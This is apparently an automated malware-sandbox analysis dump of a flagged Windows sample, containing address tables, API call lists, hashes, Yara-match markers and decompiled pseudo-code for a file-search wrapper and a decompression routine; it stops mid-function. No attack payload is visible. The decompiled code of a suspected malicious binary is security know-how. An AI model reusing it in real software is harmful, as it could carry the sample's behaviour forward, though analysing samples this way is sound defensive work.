                                                                                        0x6fe0231d
                                                                                        0x6fe02323
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe02323
                                                                                        0x6fe0231b
                                                                                        0x6fe022b2
                                                                                        0x6fe022b8
                                                                                        0x6fe022ba
                                                                                        0x6fe022c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe022c0
                                                                                        0x6fe02286
                                                                                        0x6fe0228d
                                                                                        0x6fe02293
                                                                                        0x6fe02299
                                                                                        0x00000000
                                                                                        0x6fe02299
                                                                                        0x6fe01e9d
                                                                                        0x6fe01e9e
                                                                                        0x6fe0225d
                                                                                        0x6fe0225d
                                                                                        0x6fe02263
                                                                                        0x6fe02266
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe0226d
                                                                                        0x6fe02272
                                                                                        0x00000000
                                                                                        0x6fe02272
                                                                                        0x6fe01ea5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe01eab
                                                                                        0x6fe01eab
                                                                                        0x6fe01eb4
                                                                                        0x6fe01eb9
                                                                                        0x6fe01ebf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fe01ec5
                                                                                        0x6fe01ed2
                                                                                        0x6fe01ed8
                                                                                        0x6fe01ee2
                                                                                        0x6fe01ee8
                                                                                        0x6fe01ef0
                                                                                        0x6fe01f00
                                                                                        0x00000000
                                                                                        0x6fe01f00

                                                                                        APIs
                                                                                          • Part of subcall function 6FE012BB: GlobalAlloc.KERNELBASE(00000040,?,6FE012DB,?,6FE0137F,00000019,6FE011CA,-000000A0), ref: 6FE012C5
                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FE01D2D
                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 6FE01D75
                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 6FE01D7F
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE01D92
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE01E74
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE01E79
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE01E7E
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE02068
                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 6FE02222
                                                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 6FE022A1
                                                                                        • LoadLibraryW.KERNEL32(00000008), ref: 6FE022B2
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6FE0230C
                                                                                        • lstrlenW.KERNEL32(00000808), ref: 6FE02326
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 245916457-0
                                                                                        • Opcode ID: 0b23efd17aa20152f51e4cad008615faf920db1bcf8ec0607a5a2f2f9ba1ee94
                                                                                        • Instruction ID: a575d09d7521d0f36d86bfcd2ed561e3a1c64ada38ae7068622fa8cf57875638
                                                                                        • Opcode Fuzzy Hash: 0b23efd17aa20152f51e4cad008615faf920db1bcf8ec0607a5a2f2f9ba1ee94
                                                                                        • Instruction Fuzzy Hash: 1E226A71D04606DADB10AFE8C9806EEBFF4FF1531DF30462ED165EA280D778A5A28B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: f`*
                                                                                        • API String ID: 0-1936352705
                                                                                        • Opcode ID: a0c6428f3938524e801e8074e11aa5ff9a3d8107563647fb4493096ceda848c1
                                                                                        • Instruction ID: fb1cbec3c49de2146f86cc3a857755ac73a7af829b2e27fa97c65d40757e0044
                                                                                        • Opcode Fuzzy Hash: a0c6428f3938524e801e8074e11aa5ff9a3d8107563647fb4493096ceda848c1
                                                                                        • Instruction Fuzzy Hash: BAF19865809BCA4BC726CB7888942C97F959F83A74B280BC9C5B44FAE3DF11C586C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 39%
                                                                                        			E0040290B(short __ebx, short* __edi) {
                                                                                        				void* _t21;
                                                                                        
                                                                                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                        					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                        					_push(_t21 - 0x2b0);
                                                                                        					_push(__edi);
                                                                                        					E0040653D();
                                                                                        				} else {
                                                                                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                        					 *__edi = __ebx;
                                                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                        				return 0;
                                                                                        			}




                                                                                        0x00402923
                                                                                        0x0040293e
                                                                                        0x00402949
                                                                                        0x0040294a
                                                                                        0x00402a94
                                                                                        0x00402925
                                                                                        0x00402928
                                                                                        0x0040292b
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                                        • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                        • Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
                                                                                        • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9
                                                                                        • API String ID: 0-2366072709
                                                                                        • Opcode ID: 0256b100c7a4153942185fc63172ae7f9b110119c2cbc1e034919c4c63719e87
                                                                                        • Instruction ID: 7488ed60c2ac04beacbb1a35a5200461aaa3b8df64105801e33ac95f2c7e4af4
                                                                                        • Opcode Fuzzy Hash: 0256b100c7a4153942185fc63172ae7f9b110119c2cbc1e034919c4c63719e87
                                                                                        • Instruction Fuzzy Hash: 029104725047869FCB318F788C587EA3BA2AF86670F59475DCCB85B2E1DB318582CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoadMemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3389902171-0
                                                                                        • Opcode ID: 6ea73931679426b5157bb3802aa6a0b6fe0f920dbc2c67d1b578a814cd0add47
                                                                                        • Instruction ID: f2c717a8d2a5e868450700bbc6c0f8e4d72b9d15675dab0db5634b926b773831
                                                                                        • Opcode Fuzzy Hash: 6ea73931679426b5157bb3802aa6a0b6fe0f920dbc2c67d1b578a814cd0add47
                                                                                        • Instruction Fuzzy Hash: A44228315043858EDF319F38C9A87DB7BA29F52360F49826ECCDA8F296D7348586C712
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E00406D85(signed int __ebx, signed int* __esi) {
                                                                                        				signed int _t396;
                                                                                        				signed int _t425;
                                                                                        				signed int _t442;
                                                                                        				signed int _t443;
                                                                                        				signed int* _t446;
                                                                                        				void* _t448;
                                                                                        
                                                                                        				L0:
                                                                                        				while(1) {
                                                                                        					L0:
                                                                                        					_t446 = __esi;
                                                                                        					_t425 = __ebx;
                                                                                        					if( *(_t448 - 0x34) == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					L55:
                                                                                        					__eax =  *(__ebp - 0x38);
                                                                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        					__ecx = __ebx;
                                                                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        					__ebx = __ebx + 8;
                                                                                        					while(1) {
                                                                                        						L56:
                                                                                        						if(__ebx < 0xe) {
                                                                                        							goto L0;
                                                                                        						}
                                                                                        						L57:
                                                                                        						__eax =  *(__ebp - 0x40);
                                                                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                        						__ecx = __eax;
                                                                                        						__esi[1] = __eax;
                                                                                        						__ecx = __eax & 0x0000001f;
                                                                                        						if(__cl > 0x1d) {
                                                                                        							L9:
                                                                                        							_t443 = _t442 | 0xffffffff;
                                                                                        							 *_t446 = 0x11;
                                                                                        							L10:
                                                                                        							_t446[0x147] =  *(_t448 - 0x40);
                                                                                        							_t446[0x146] = _t425;
                                                                                        							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                        							L11:
                                                                                        							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                        							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                        							E004074F4( *(_t448 + 8));
                                                                                        							return _t443;
                                                                                        						}
                                                                                        						L58:
                                                                                        						__eax = __eax & 0x000003e0;
                                                                                        						if(__eax > 0x3a0) {
                                                                                        							goto L9;
                                                                                        						}
                                                                                        						L59:
                                                                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                        						__ebx = __ebx - 0xe;
                                                                                        						_t94 =  &(__esi[2]);
                                                                                        						 *_t94 = __esi[2] & 0x00000000;
                                                                                        						 *__esi = 0xc;
                                                                                        						while(1) {
                                                                                        							L60:
                                                                                        							__esi[1] = __esi[1] >> 0xa;
                                                                                        							__eax = (__esi[1] >> 0xa) + 4;
                                                                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                        								goto L68;
                                                                                        							}
                                                                                        							L61:
                                                                                        							while(1) {
                                                                                        								L64:
                                                                                        								if(__ebx >= 3) {
                                                                                        									break;
                                                                                        								}
                                                                                        								L62:
                                                                                        								if( *(__ebp - 0x34) == 0) {
                                                                                        									goto L182;
                                                                                        								}
                                                                                        								L63:
                                                                                        								__eax =  *(__ebp - 0x38);
                                                                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        								__ecx = __ebx;
                                                                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        								__ebx = __ebx + 8;
                                                                                        							}
                                                                                        							L65:
                                                                                        							__ecx = __esi[2];
                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                        							__ebx = __ebx - 3;
                                                                                        							_t108 = __ecx + 0x4084d4; // 0x121110
                                                                                        							__ecx =  *_t108;
                                                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                        							__ecx = __esi[1];
                                                                                        							__esi[2] = __esi[2] + 1;
                                                                                        							__eax = __esi[2];
                                                                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                        								goto L64;
                                                                                        							}
                                                                                        							L66:
                                                                                        							while(1) {
                                                                                        								L68:
                                                                                        								if(__esi[2] >= 0x13) {
                                                                                        									break;
                                                                                        								}
                                                                                        								L67:
                                                                                        								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                                                        								__eax =  *_t119;
                                                                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                        								_t126 =  &(__esi[2]);
                                                                                        								 *_t126 = __esi[2] + 1;
                                                                                        							}
                                                                                        							L69:
                                                                                        							__ecx = __ebp - 8;
                                                                                        							__edi =  &(__esi[0x143]);
                                                                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                        							__eax = 0;
                                                                                        							 *(__ebp - 8) = 0;
                                                                                        							__eax =  &(__esi[3]);
                                                                                        							 *__edi = 7;
                                                                                        							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                        							if(__eax != 0) {
                                                                                        								L72:
                                                                                        								 *__esi = 0x11;
                                                                                        								while(1) {
                                                                                        									L180:
                                                                                        									_t396 =  *_t446;
                                                                                        									if(_t396 > 0xf) {
                                                                                        										break;
                                                                                        									}
                                                                                        									L1:
                                                                                        									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                                                        										case 0:
                                                                                        											L101:
                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                        											__eax = __esi[5];
                                                                                        											__esi[2] = __esi[5];
                                                                                        											 *__esi = 1;
                                                                                        											goto L102;
                                                                                        										case 1:
                                                                                        											L102:
                                                                                        											__eax = __esi[3];
                                                                                        											while(1) {
                                                                                        												L105:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L103:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												L104:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L106:
                                                                                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                        											__ecx = __esi[2];
                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                        											__eflags = __ecx;
                                                                                        											if(__ecx != 0) {
                                                                                        												L108:
                                                                                        												__eflags = __cl & 0x00000010;
                                                                                        												if((__cl & 0x00000010) == 0) {
                                                                                        													L110:
                                                                                        													__eflags = __cl & 0x00000040;
                                                                                        													if((__cl & 0x00000040) == 0) {
                                                                                        														goto L125;
                                                                                        													}
                                                                                        													L111:
                                                                                        													__eflags = __cl & 0x00000020;
                                                                                        													if((__cl & 0x00000020) == 0) {
                                                                                        														goto L9;
                                                                                        													}
                                                                                        													L112:
                                                                                        													 *__esi = 7;
                                                                                        													goto L180;
                                                                                        												}
                                                                                        												L109:
                                                                                        												__esi[2] = __ecx;
                                                                                        												__esi[1] = __eax;
                                                                                        												 *__esi = 2;
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											L107:
                                                                                        											__esi[2] = __eax;
                                                                                        											 *__esi = 6;
                                                                                        											goto L180;
                                                                                        										case 2:
                                                                                        											L113:
                                                                                        											__eax = __esi[2];
                                                                                        											while(1) {
                                                                                        												L116:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L114:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												L115:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L117:
                                                                                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        											__ecx = __eax;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - __eax;
                                                                                        											__eflags = __ebx;
                                                                                        											__eax = __esi[4] & 0x000000ff;
                                                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                                                        											__eax = __esi[6];
                                                                                        											__esi[2] = __esi[6];
                                                                                        											 *__esi = 3;
                                                                                        											goto L118;
                                                                                        										case 3:
                                                                                        											L118:
                                                                                        											__eax = __esi[3];
                                                                                        											while(1) {
                                                                                        												L121:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L119:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												L120:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L122:
                                                                                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                                                        											__ecx = __esi[2];
                                                                                        											__eax = __esi[2] + __eax * 4;
                                                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                        											__ecx =  *__eax & 0x000000ff;
                                                                                        											__eflags = __cl & 0x00000010;
                                                                                        											if((__cl & 0x00000010) == 0) {
                                                                                        												L124:
                                                                                        												__eflags = __cl & 0x00000040;
                                                                                        												if((__cl & 0x00000040) != 0) {
                                                                                        													goto L9;
                                                                                        												}
                                                                                        												L125:
                                                                                        												__esi[3] = __ecx;
                                                                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                        												__esi[2] = __eax;
                                                                                        												goto L180;
                                                                                        											}
                                                                                        											L123:
                                                                                        											__esi[2] = __ecx;
                                                                                        											__esi[3] = __eax;
                                                                                        											 *__esi = 4;
                                                                                        											goto L180;
                                                                                        										case 4:
                                                                                        											L126:
                                                                                        											__eax = __esi[2];
                                                                                        											while(1) {
                                                                                        												L129:
                                                                                        												__eflags = __ebx - __eax;
                                                                                        												if(__ebx >= __eax) {
                                                                                        													break;
                                                                                        												}
                                                                                        												L127:
                                                                                        												__eflags =  *(__ebp - 0x34);
                                                                                        												if( *(__ebp - 0x34) == 0) {
                                                                                        													goto L182;
                                                                                        												}
                                                                                        												L128:
                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                        												__ecx = __ebx;
                                                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                        												__ebx = __ebx + 8;
                                                                                        												__eflags = __ebx;
                                                                                        											}
                                                                                        											L130:
                                                                                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                        											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                        											__ecx = __eax;
                                                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                        											__ebx = __ebx - __eax;
                                                                                        											__eflags = __ebx;
                                                                                        											 *__esi = 5;
                                                                                        											goto L131;
                                                                                        										case 5:
                                                                                        											L131:
                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                        											__edx = __esi[3];
                                                                                        											__eax = __eax - __esi;
                                                                                        											__ecx = __eax - __esi - 0x1ba0;
                                                                                        											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                        											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                        												__ecx = __eax;
                                                                                        												__ecx = __eax - __edx;
                                                                                        												__eflags = __ecx;
                                                                                        											} else {
                                                                                        												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                        												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                        												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                        											}
                                                                                        											__eflags = __esi[1];
                                                                                        											 *(__ebp - 0x20) = __ecx;
                                                                                        											if(__esi[1] != 0) {
                                                                                        												L135:
                                                                                        												__edi =  *(__ebp - 0x2c);
                                                                                        												do {
                                                                                        													L136:
                                                                                        													__eflags = __edi;
                                                                                        													if(__edi != 0) {
                                                                                        														goto L152;
                                                                                        													}
                                                                                        													L137:
                                                                                        													__edi = __esi[0x26e8];
                                                                                        													__eflags = __eax - __edi;
                                                                                        													if(__eax != __edi) {
                                                                                        														L143:
                                                                                        														__esi[0x26ea] = __eax;
                                                                                        														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                        														__eax = __esi[0x26ea];
                                                                                        														__ecx = __esi[0x26e9];
                                                                                        														__eflags = __eax - __ecx;
                                                                                        														 *(__ebp - 0x30) = __eax;
                                                                                        														if(__eax >= __ecx) {
                                                                                        															__edi = __esi[0x26e8];
                                                                                        															__edi = __esi[0x26e8] - __eax;
                                                                                        															__eflags = __edi;
                                                                                        														} else {
                                                                                        															__ecx = __ecx - __eax;
                                                                                        															__edi = __ecx - __eax - 1;
                                                                                        														}
                                                                                        														__edx = __esi[0x26e8];
                                                                                        														__eflags = __eax - __edx;
                                                                                        														 *(__ebp - 8) = __edx;
                                                                                        														if(__eax == __edx) {
                                                                                        															__edx =  &(__esi[0x6e8]);
                                                                                        															__eflags = __ecx - __edx;
                                                                                        															if(__ecx != __edx) {
                                                                                        																__eax = __edx;
                                                                                        																__eflags = __eax - __ecx;
                                                                                        																 *(__ebp - 0x30) = __eax;
                                                                                        																if(__eax >= __ecx) {
                                                                                        																	__edi =  *(__ebp - 8);
                                                                                        																	__edi =  *(__ebp - 8) - __eax;
                                                                                        																	__eflags = __edi;
                                                                                        																} else {
                                                                                        																	__ecx = __ecx - __eax;
                                                                                        																	__edi = __ecx;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														__eflags = __edi;
                                                                                        														if(__edi == 0) {
                                                                                        															goto L183;
                                                                                        														} else {
                                                                                        															goto L152;
                                                                                        														}
                                                                                        													}
                                                                                        													L138:
                                                                                        													__ecx = __esi[0x26e9];
                                                                                        													__edx =  &(__esi[0x6e8]);
                                                                                        													__eflags = __ecx - __edx;
                                                                                        													if(__ecx == __edx) {
                                                                                        														goto L143;
                                                                                        													}
                                                                                        													L139:
                                                                                        													__eax = __edx;
                                                                                        													__eflags = __eax - __ecx;
                                                                                        													if(__eax >= __ecx) {
                                                                                        														__edi = __edi - __eax;
                                                                                        														__eflags = __edi;
                                                                                        													} else {
                                                                                        														__ecx = __ecx - __eax;
                                                                                        														__edi = __ecx;
                                                                                        													}
                                                                                        													__eflags = __edi;
                                                                                        													if(__edi == 0) {
                                                                                        														goto L143;
                                                                                        													}
                                                                                        													L152:
                                                                                        													__ecx =  *(__ebp - 0x20);
                                                                                        													 *__eax =  *__ecx;
                                                                                        													__eax = __eax + 1;
                                                                                        													__ecx = __ecx + 1;
                                                                                        													__edi = __edi - 1;
                                                                                        													__eflags = __ecx - __esi[0x26e8];
                                                                                        													 *(__ebp - 0x30) = __eax;
                                                                                        													 *(__ebp - 0x20) = __ecx;
                                                                                        													 *(__ebp - 0x2c) = __edi;
                                                                                        													if(__ecx == __esi[0x26e8]) {
                                                                                        														__ecx =  &(__esi[0x6e8]);
                                                                                        														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                        													}
                                                                                        													_t357 =  &(__esi[1]);
                                                                                        													 *_t357 = __esi[1] - 1;
                                                                                        													__eflags =  *_t357;
                                                                                        												} while ( *_t357 != 0);
                                                                                        											}
                                                                                        											goto L23;
                                                                                        										case 6:
                                                                                        											L156:
                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                        											__edi =  *(__ebp - 0x30);
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax != 0) {
                                                                                        												L172:
                                                                                        												__cl = __esi[2];
                                                                                        												 *__edi = __cl;
                                                                                        												__edi = __edi + 1;
                                                                                        												__eax = __eax - 1;
                                                                                        												 *(__ebp - 0x30) = __edi;
                                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                                        												goto L23;
                                                                                        											}
                                                                                        											L157:
                                                                                        											__ecx = __esi[0x26e8];
                                                                                        											__eflags = __edi - __ecx;
                                                                                        											if(__edi != __ecx) {
                                                                                        												L163:
                                                                                        												__esi[0x26ea] = __edi;
                                                                                        												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                                        												__edi = __esi[0x26ea];
                                                                                        												__ecx = __esi[0x26e9];
